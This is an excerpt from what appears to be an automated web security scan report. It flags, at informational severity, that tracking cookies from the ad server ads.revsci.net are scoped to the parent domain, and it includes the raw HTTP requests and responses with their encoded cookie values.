The following cookies were issued by the application and are scoped to a parent of the issuing domain: the rsi_us_1000000, rsiPus_* and related cookies, all set with Domain=.revsci.net in the response below (several are being expired with a 1970 date under both Path=/adserver and Path=/, while rsiPus_21Ju and rsi_us_1000000 are re-issued with a Max-Age of roughly 32 years). The cookies do not appear to contain session tokens, which reduces the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_Vpu9=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; rsiPus_TE1N="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"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_21Ju="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdtxkQw36sCSYws02VZnJBV5kVSiK63S0EPqGm20LIDE9g+EqSScZygA5IU5+z66nnzLIa4a+7jtG5zGxdSOV8gUFMvADbUUtaV0aUFiT91q+ex1xkYsKntNNFsTWgrWvRLDQLcNSXvlo3q/KRLeq1Pt82RLf/iCbh+spqJnWAahKpqVwV1XfLfMqHxF1tt52T6X4XQJnlBkHE3Wh9VIiwTsaJC/Aq2Ad3J/wZkceWWAKEdn3cBVIemRNjLVhipHrU63PvzZh1oA2XIbv8Ol1lT1LA5j01RZ5k9XwOnC5XNzrIH1oz0isg0TzZW7wAl7g+OtStP75TuAqIoBh3pzL3nxQppOZbcyJtR8i+nwcV6W1s+9zZ0DRPaAUvy5sWJvgMGsbHK8j9BLddS6cOygwoKDBjGgUkE4h+R8lM2CGp4UoY3LPcymXrjZ7ITdLnOAgrLpNZX7oWm2WLksbc/dPc3bT2Y4F87eu5WmWG9pqQDYBG2hqDGgiWihTYZaXk85vn5wkZECD9XxqHxhGQG8uMFhiHYrV7GUHEGhnycIUcbYVXFWzJw45ZcDaGP53W/7kcSo6QWWOpU8KahGIE1luvVgDDeDprU9mHMUETCH1RKpzeF2tYYoADgWg1mZhWbLysDF30A85/mk/y08a5WXIrHcUO/89jMoeG/MHpq9qi88PH++kpKpgeolkyyCmBNUjSLe6lSf98K1wSSpGYcMKKBm00r2Pa5Ax5XjA1phGc1A2q3WPty6Jc89mIViybtCsaKvucMZ0x+CUSbRyT8Eu3gB2PAGcULlu4qbqfdCM8lJvkO0NcA8ErFngNyabbIW+nngn2CAX4iGqmok7lMQR5WbOF76OYQmgvjyUwTufILzg6XUOwjgbgodQtpc3VOjVC6wKFrq+e1uyFY8XG7R72ASfx61FUCYJunZDMLz7rO5GMQn/HUUZsSij6HWuBbuWoDjZCr+YFL3SrhaoHbdNv0KWOg2DyvNHYG7oEFZ4kNjozYVWp53qst38j0OcJF6lVAmZWVUQzCDjB6FZsXpFA/rNbFXwNlA56k9MCxvwLF2xnb4n2BWu/nIGtet5cYKjqiefRfVhzOI7W+WK6xu4I4g1SldqVcN5+xGhW08iGnmBJQCtMebPuzVs57PnlNG594/4M2ZlaVgiYXVDMqpYntiVuMwLui2KlpyBieSZohEvUpgVIc866H3cPxeiwwWwKR3MyumJg0unOjSFXohJQyZmQfW5dHaNKg8SBtalXffCnIO3VO9/m+epl8h/516tdq80AR8GGHK/oH/uQgYhPup0jy4wQ3x2XxFxVHxWekwsYRFACs4Im8ipdFuKel/fDp4Wcf4/wGHvG38kNUrYRLH/5IUfh1HslclbaPeX+9U/viEhoLftEnD17Dvw0vA4q5yeBDFnd+R6E/nNj1beItLdElbAMusvIEBzs4srCP/lMhCEh1yJFUv+zuqxT43RbuNwJaYnKoQesQHlZB1DDw9lcA+eAhrOGZq2Ouse4JJqWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:05 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.5. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: the rsi_us_1000000, rsiPus_* and related cookies, all set with Domain=.revsci.net in the response below. The cookies do not appear to contain session tokens, which reduces the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="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"; rsi_us_1000000="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"; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; 
rtc_v0Na=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; rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; 
rtc_SA26=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; udm_0=MLv3NzMJZjpn3hepL5u85DdJSwnsJulKw7GjhUc66G1t5sARqqsaA7LZsKuuAdTsr767GbQcHDkWCrTmeWLtWp6yJz762TB1UwcjeHZXUyd9djFNJcLio30yxF0HHJw8BhRaZV09XADuFryc7t6F+RKBP1VaY7UwWUB6Hqw/8hvNvCj0P2aI5BUiVaG+ymma61YZrZ6cNi/7+BUP0nU3S/7aDey8pNKbTFe5PtnGelVZx+7RzWne/EK0Hqzvg/cAt24xuyuQiRcU+otjq8L91/vhBet19A0gHxTyU8bHnQxFZQGXBELihm7JUcNFWfDqL5oCOH9CkkBF/VWGyJdwtLmAAMBzOVpAH5rEQxhhn0ldtQhNKu95VbXaqi9Hy7HcpaYFFAG0gZBby/Ino2ND/TX6tyQ5BZVEmjC+vrBUCdi5gDjg8vCrIq6mOhXIxsr1rgP8VqKRS2482lJZLRiYVHVavyAnmm0xR9AiAdeo7Ulq59C1wDZnxwfvLEeBAQQvJD4UAZPMnAWC71qNBnXlSwn6B+iu+W0enrMzUh+pt/42W3ZyHY6wPL0wN55ZpdBoj2pz9x8DZxFJC8/0xAJN9asAv63LYh4pP2tKYCBkV7sKBfAVfyGLdNX/pP4+LEd7PMBqXJitqkzbF9+MLaphweZ3TkcNlE7FaGnjxQPdRypua7cLagU/pdcDVheJzU1Qpv5fnqo9hEcP5pXLebWRI35fOi6VMBuXnQHASM+ZvmIW7roY6dkcDDEPcSnE/eVzUk1c/p+XX0Gk0keWgb40WTFsa/iaQB6LydhfqaYhZGfvb7xoznGXYdL5IifgNcFokjWzep4hkl8kRRTKjBctzuSV0dfTjVJqWlkVn7ojPnTBtr7nvJyfyXssvc/oZPEKn6xtEkyP+huheQDpHwPE81CoOtg/xxDXS0cNluwSTrrZ/tcX/xM4VOQR6XJV7wiNgHj3COP52BgkFWuYCBWpp1Ij5FPQMSbt7pTH2c7UBstZHYsg3GEOgYj0QEAQUa+Gg3z/6YHY+hy
OzKt+cCLpId3IuTquVU751kovG4jfZSDMngJEtub6vIo6aw9Ns/MIKRJThup9RJD3VB7EqUTygRfVC30WTM3yC/zCJcQvarkTIoqam+R1D4GnO60sxQIS+e/mX1w/KtPS81kyXN6TiaVQ7uglYyqBXtk/zz0qF6qzFm//Nv417kCWRG0/vOhqEU/d8q3yrAyqHEYTSMmgweeGAIN90FXwo5jDGblHJSyXqxHWV9tUDHtz1PxpJxB1N8GXbFB5TYAQUhQ7vJg7adz9jm8rfw8Y7beMhj+wZIuYSnRxUzpmUnS6ofeg1QUuC+Z3qf9S7L5SQNszvtcoLBc9Ah719T7f1ysEtywa9Vsd4Wwjl8zKCUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmxDEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jawe="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4i2jMIYZ7ES1kb10eZfVkVm7iIJZBa5Z642kqPytE/lFy+9C7Its0hWRkE8F6vlyBe/9Trz9i3gmy4SmoNYf4RgLJ57l6XK2XM/zpxd+bWfKtBiH1p4PveCiA30MI78vG1slAzQEuI4Pj+v4BdLCmIoU5Yani/TSqHGz6VoMwG4CC7VGiDuesbxiXf2W2Iqk52/xeAS+0Rjlz2nwqJ6CfeZ4xISeLhfuygLAPAlgi3xGkXLZ5wezJstSrtcZvJqS5DcF4vEdvh0cSV7drZl3996CIo/lAKkqMjpJoN9EOahRHkbj76DE8ADMQwfo3txn/IZhZGxYdBlwhaEDOB+aFAWS+uNtb19XpabQhu5AgMMrXDR0tbd/Z4AveSJ+//M8i8Fp6O8tP7EwsqdbWF6A3E+uXrpIU5e5W8VMBQA2jr39wIlmH0e0a3kexbltOd9lpf9D/gz8AiZPbvNt3jaqCsnewupAsprKHp30HU9z7PEnSz2LIFkh2SycQUEy/0oeQ6kpjiC3Y7zkrhJNI5oheGtAtEZtSsH2km/NN0qMzYyTvrwurIlgwZfHcq642qtp0HAFYBszyc5HRY7z27QXKawd5eqdAiwI1sNzUV8GYgkzytrqTth+eZJtOkV6DgxzVxlrXY+5mc2THvCA+ily4O24IMuEnJTXoZmpSgHQD89+2/fVTpN4aqXKNnzDREGGnsEuj+gObqhzbc0jTN6wpjAsV82F6cZgGaajYS1fTcKMVVdcJNbESUizsTti8oky+L2t22c53o8F87DIYOlifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2rc9H80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe5tUy6iijtrwNpWUysX3FcgWlT9CuHU3gJRHyJPxVGfJBTFJujfwmoI+hRnc0LKORZAW1k5UeRkcRWCxLU52Me6ffBrSbQX2gnquKfS/b2VxpsWIm9rqf9zggWUDUrLtjKHHb1VVj+DgCD8+I6KxeXWrM0HOR10VA4/0vBbIbNfATwNEy72w8TZPWEb3p6LuFVvkrmJba841Ct2n2oS5ZeOq92UJQC6zjcYBLSxhF/t0AXtP7snMG+fZJDQwTvYGIQxtQZHil+3kXGDsffUdM3gb5syA9TCD/GpqE7Q3zYla7eCr5CWRdyEo3aZArBm7SqICFsHGhZS